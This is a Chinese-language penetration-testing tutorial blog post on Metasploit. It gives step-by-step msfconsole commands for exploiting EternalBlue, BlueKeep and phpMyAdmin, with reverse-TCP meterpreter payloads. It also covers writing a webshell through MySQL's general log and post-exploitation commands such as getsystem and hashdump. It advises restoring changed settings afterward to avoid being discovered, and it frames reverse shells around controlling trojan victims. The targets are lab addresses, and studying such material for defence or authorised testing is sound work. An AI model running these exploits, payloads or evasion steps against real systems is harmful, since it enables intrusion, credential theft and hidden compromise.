zoukankan      html  css  js  c++  java
  • 渗透利器-kali工具 (第五章-4) Metasploit漏洞利用模块一

    本文内容:

    • 永恒之蓝
    • 实战漏洞利用
    • MSF会话常用命令

    1,永恒之蓝:
      永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统可以执行任意代码。

      SMB:Web协议中的一种,就是Web客户端去访问服务器端的一种协议。

      使用MSF实现"永恒之蓝"的快速攻击,就是利用MSF中针对ms17-101漏洞的攻击载荷进行攻击获取主机控制权限。

    2,实战漏洞利用:

      1.phpAdmin日志写shell:

        前提条件:用户是root

        思路:

          就是利用mysql的一个日志文件,这个日志文件每执行一个sql语句就会将其执行的语言保存。

          我们将这个日志文件重命名为shell.php 然后去执行一个sql语句,带有一句话木马的命令。

          然后再使用菜刀链接,就可以了。

        设置导出文件:

          general log    OFF--ON

          general log file   设置一个路径,执行sql语句,访问设置的路径即可。

        参考文章:

        注意:完成测试之后,需要将修改设置的地方,修改回来,以防被发现。

      2.MSF获取Get Shell:

        实战演示:phpMyAdmin

        1.查找模块:earch name:phpmyadmin / search CVE-2018-12611

        2.使用模块:use exploit/multi/http/phpmyadmin_lfi_rce

        3.查看设置选项:options [rhosts、targeturl、password]

        4.设置目标地址:set rhosts 127.0.0.1

        5.设置目标范围:set targetrul phpMyAdmin

        6.设置密码:set password root

        7.选择payload:set payload php/meterpreter/reverse_tcp

        8.查看设置选项:options [lhost]

        9.设置本机地址:set lhost 127.0.0.2

        10.开始攻击:run/exploit

      3.永恒之蓝:

        使用模块名:

          auxiliary/scanner/smb/smb_ms17_010

          exploit/windows/smb/ms17_010_eternalblue

        1.查找模块:search ms17

        2.使用模块:use auxiliary/scanner/smb/smb_ms17_010

        3.查看设置选项options[rhosts]

        4.设置目标地址:set rhosts 127.0.0.1

        5.扫描一下:exploit,出现一个绿色的+号,说明易受攻击

        6.使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

        7.查看设置选项:options [rhosts]

        8.设置目标地址:set rhosts 127.0.0.1

        9.设置payload:set payload windows/x64/meterpreter/reverse_tcp [64位的,因为靶机是64位的]

        10.查看设置选项:options [lhost]

        11.设置本地地址:set lhost 127.0.0.2

        12.开始攻击:run

        补充:

          有的时候,在扫描靶机的时候,不会出现绿色+号

          可以使用靶机和kali互相ping一下,看是否能ping通,如果ping不通

          可以查看两个机器的ip是否在同一网段,将他们设置为同一个网段,如果还不行,将靶机防火墙关闭,试试。

          蓝屏是计算机自动保护系统,存在一定几率出现蓝屏。

      4.MSF永恒之蓝[实现蓝屏]:

        Kali,MSF中没有这个:cve-2019-0708exploit

        需要自己安装:git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce

        需要自己配置;

          1. 第一步,配置rdp.rb: 存放rdp.rb到 /usr/share/metasploit-framework/lib/msf/core/exploit 目录下

          2. 第二步,配置rdp_scanner.rb :存放rdp_scanner.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

          3. 第三步,配置cve_2019_0708_bluekeep.rb:存放cve_2019_0708_bluekeep.rb到/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp目录下

          4. 第四步,配置cve_2019_0708_bluekeep_rce.rb:存放cve_2019_0708_bluekeep_rce.rb到/usr/share/metasploit-framework/modules/exploits/windows/rdp ------这里可能没有rdp这个文件夹,如果没有自己创建一个,到这里配置就完成了。

          5.需要全部加载一下:reload_all [否则到时候可能读不到模块]

        实现步骤:

          1.使用辅助模块:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep 

          2.设置目标地址:set rhosts 127.0.0.1

          3.检测一下:run 出现绿色 + 号,易受攻击

          4.使用攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

          5.设置目标地址:set rhosts   127.0.0.1

          6.设置端口:set rport 3389

          7.查看攻击方式:show targets

          8.我这里选择vmware 15 就是4 :set target 4

          9.开始攻击:run

      5.shell:

        了解shell:

          连接一般分为正向连接和反向链接:

            正向连接:对方服务器开放端口,让我们去访问:

              例如使用:telnet 127.0.0.1:80

            反向链接:我们开放端口,让对方反问:

              也就是让对方来找我们的端口,例如:反弹shell

        反弹shell:

          reverse shell,端口,被控端发起请求到该端口,并将其命令行的输入就是控制端监听在某TCP/UDP输出到控制端。

        为什么要反弹shell:

          1.某客户机中了你的网马,但是它在局域网内,你直接访问不了,它的IP会动态改变,你不能持续控制。

          2.由于防火墙等限制,对方机器只能发送请求,不能接受请求。

          3.对于病毒,木马受害者什么时候能中号,对方网络环境是什么样的,什么时候关机,都是未知,所以建立一个服务端,让而已程序主动连接,才是上策。

          4.反弹很好理解:攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

    3,MSF会话常用命令:

      通过反弹shell获得会话常用命令:

      1.文件系统命令:

        edit           编辑文件

        getlwd         显示本地工作目录

        Dir          列出目标文件目录

        mkdir         创建目录

      2.网络、系统命令:

        ipconfig      显示网络接口信息

        netstat        显示网络连接信息

        execute       执行命令

        ps          列出正在运行的进程

        sysinfo        获取远程系统给的有关信息,例如os

      3.用户界面命令:

        getdesktop     获取当前的Meterpreter桌面

        screenshot     获取目标桌面屏幕截图

      4.提权、密码命令:

        getsystem     尝试将你的权限提升为本地系统的权限

        hashdump     获取目标NTLM-HASH值

          

        

  • 相关阅读:
    [转].net mvc + vuejs 的项目结构
    Outlook IMAP 修改PST文件存储路径
    VS2017 性能优化方法
    查询存储过程所需参数
    如何保障微服务架构下的数据一致性
    sqlserver批量给用户配置存储过程权限
    vue中刷新当前页面或重新加载的两种方法
    vue history模式下的微信支付,及微信支付授权目录的填写,处理URL未注册
    Vue 四行代码实现无感知上拉加载更多
    2019年前端必用正则(js)
  • 原文地址:https://www.cnblogs.com/xz25/p/12918347.html
Copyright © 2011-2022 走看看